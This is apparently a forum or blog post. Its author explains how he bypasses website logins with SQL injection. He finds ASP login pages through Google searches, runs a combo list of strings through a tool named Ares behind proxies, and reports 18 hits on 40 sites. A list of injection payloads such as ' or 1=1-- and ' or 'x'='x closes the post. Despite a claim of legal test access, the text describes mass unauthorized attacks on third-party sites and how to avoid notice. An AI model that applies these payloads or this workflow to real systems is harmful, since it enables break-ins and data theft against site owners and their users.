i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

good luck

Read More..
Category:   Leave a Comment